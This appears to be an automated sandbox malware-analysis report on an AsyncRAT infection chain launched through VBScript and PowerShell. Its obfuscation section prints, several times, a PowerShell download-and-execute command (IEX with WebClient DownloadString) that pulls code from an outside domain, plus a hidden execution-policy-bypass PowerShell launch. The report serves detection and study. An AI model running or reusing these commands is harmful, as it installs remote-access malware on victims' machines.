                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: NewPE2.pdb source: powershell.exe, 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: NewPE2.pdb(@ source: powershell.exe, 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWeRSHeLL [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';", "0", "true");
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, EwV3ECxYhIse1SOarW.cs.Net Code: uDdV8u69VKLnNev38PJ(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{uDdV8u69VKLnNev38PJ(typeof(IntPtr).TypeHandle),typeof(Type)})
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, EwV3ECxYhIse1SOarW.cs.Net Code: uDdV8u69VKLnNev38PJ(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{uDdV8u69VKLnNev38PJ(typeof(IntPtr).TypeHandle),typeof(Type)})
                .NET source code contains potential unpacker
                Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, IupxYtKFNoaX.cs.Net Code: lyDvXmXrrCN System.AppDomain.Load(byte[])
                Obfuscated command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)Jump to behavior
                Suspicious powershell command line found
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7554FA push eax; iretd 1_2_00007FFD9B755561
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7500AD pushad ; iretd 1_2_00007FFD9B7500C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B823AF0 push eax; retf 1_2_00007FFD9B823AF1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B7200AD pushad ; iretd 6_2_00007FFD9B7200C1
                Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, cbljdLySIgCA.csHigh entropy of concatenated method names: 'dhCeQmXpcgyBijcH', 'DJqzKtqrUbJ', 'uNPuvhbzfHhJyh', 'cqrFuRFwWGTK', 'WcOIUbsIrHPR', 'iaoKesjYfLxq', 'dUZBovZRQcd', 'kUYsJfvWWgp', 'zhZTwzLNlfrm', 'OEVVqFZcPutM'
                Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, RocSfwPnWyktz.csHigh entropy of concatenated method names: 'XTdVrOsCOSbN', 'buLxhepmFGXlsko', 'xxmaXoaMBoR', 'UDBGHeLamrX', 'gASjXIDzFqKYKVv', 'wJvgTekLqkAq', 'OSZytWtuysTRtA', 'jqhhElYvYyJBhtU', 'iasWvLXcFTewc', 'GBJGdGbhYY'
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, EwV3ECxYhIse1SOarW.csHigh entropy of concatenated method names: 'coIv6gaxrKyOU6UxhGB', 'YmKxVlaSSMxjg7yeSZr', 'BPTavEfPI8', 'pdaPcya8thctOw7jJPR', 'e52AmiaR6Zmb9lryLLG', 'VFhmi5apOUL45Layo85', 's7lkoDagZ7SB5rZQITN', 'q7yQT6aJ19wG5Ff3PrV', 'eUANGaaiQTIQvIro7Lh', 'yOG8BOaIDUqRkTkYGTt'
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, geUwbRLwd0WNm7K3QP.csHigh entropy of concatenated method names: 'rkesS35Cky', 'auIkQH6o4NfXZEtqLWo', 'UtNfEh6dtiuHEv5GyR3', 'tobPIO6cNsowhYm6JYZ', 'z08y4G6OJTjebtPXsBe', 'xM0xGg6Dv9ifjCVCALk', 's2oSNh6kHwXWCjPNT1e', 'RHJgFS6jYOqPmd8yqch', 'HCgwjo6NdCdqwgS1jXN'
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, Native.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'M2DDfJCjDKI6dkvGbUU', 'HytCt3CceuoYVLARgTH', 'asbBtkCOLuWCxWmxMrH', 'iPe0TGCNg1ulsrFuGHe', 'XE084OCYFp6QURxQXNM', 'xNDrW9CmxlBnIETjTvQ'
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, Str.csHigh entropy of concatenated method names: 'ReverseString', 'BinaryToString', 'yRVbf4CTORcmD8WTJOo', 'CGyNH1CXiymcSWZhYiZ', 'fAYOIbCErgtjxemufl3', 'Y23WHXCwRSKNSXICkhU', 'IvO6ajC1bhZeT4AHTEO', 'vHGAm5CepTLTEblhDwj', 'Vx8Qx4CvcsaBOBt7IZf', 'n2p6k0CrwoLDc063WAb'
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, PE.csHigh entropy of concatenated method names: 'Execute', 'muFoq8CAseaYDIPspOv', 'KRwVQXCGtZfeLlAnof5', 'arNOAMCxGMOePGZ8BMp', 'nnjcWOCSyXwHiJoVevG', 'Tvu02TCfqoPNp1rrRW2', 'nFaWI9Cl6YnHEcOun9x', 'oUX4ckCK7QI2rXqWGRQ', 'GFGnodC8lHNWHj6unEy', 'wBS7MKCRFTgjZ1Q4fVT'
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, EwV3ECxYhIse1SOarW.csHigh entropy of concatenated method names: 'coIv6gaxrKyOU6UxhGB', 'YmKxVlaSSMxjg7yeSZr', 'BPTavEfPI8', 'pdaPcya8thctOw7jJPR', 'e52AmiaR6Zmb9lryLLG', 'VFhmi5apOUL45Layo85', 's7lkoDagZ7SB5rZQITN', 'q7yQT6aJ19wG5Ff3PrV', 'eUANGaaiQTIQvIro7Lh', 'yOG8BOaIDUqRkTkYGTt'
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, geUwbRLwd0WNm7K3QP.csHigh entropy of concatenated method names: 'rkesS35Cky', 'auIkQH6o4NfXZEtqLWo', 'UtNfEh6dtiuHEv5GyR3', 'tobPIO6cNsowhYm6JYZ', 'z08y4G6OJTjebtPXsBe', 'xM0xGg6Dv9ifjCVCALk', 's2oSNh6kHwXWCjPNT1e', 'RHJgFS6jYOqPmd8yqch', 'HCgwjo6NdCdqwgS1jXN'
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, Native.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'M2DDfJCjDKI6dkvGbUU', 'HytCt3CceuoYVLARgTH', 'asbBtkCOLuWCxWmxMrH', 'iPe0TGCNg1ulsrFuGHe', 'XE084OCYFp6QURxQXNM', 'xNDrW9CmxlBnIETjTvQ'
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, Str.csHigh entropy of concatenated method names: 'ReverseString', 'BinaryToString', 'yRVbf4CTORcmD8WTJOo', 'CGyNH1CXiymcSWZhYiZ', 'fAYOIbCErgtjxemufl3', 'Y23WHXCwRSKNSXICkhU', 'IvO6ajC1bhZeT4AHTEO', 'vHGAm5CepTLTEblhDwj', 'Vx8Qx4CvcsaBOBt7IZf', 'n2p6k0CrwoLDc063WAb'
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, PE.csHigh entropy of concatenated method names: 'Execute', 'muFoq8CAseaYDIPspOv', 'KRwVQXCGtZfeLlAnof5', 'arNOAMCxGMOePGZ8BMp', 'nnjcWOCSyXwHiJoVevG', 'Tvu02TCfqoPNp1rrRW2', 'nFaWI9Cl6YnHEcOun9x', 'oUX4ckCK7QI2rXqWGRQ', 'GFGnodC8lHNWHj6unEy', 'wBS7MKCRFTgjZ1Q4fVT'

                Boot Survival

                barindex
                Yara detected AsyncRAT
                Source: Yara matchFile source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
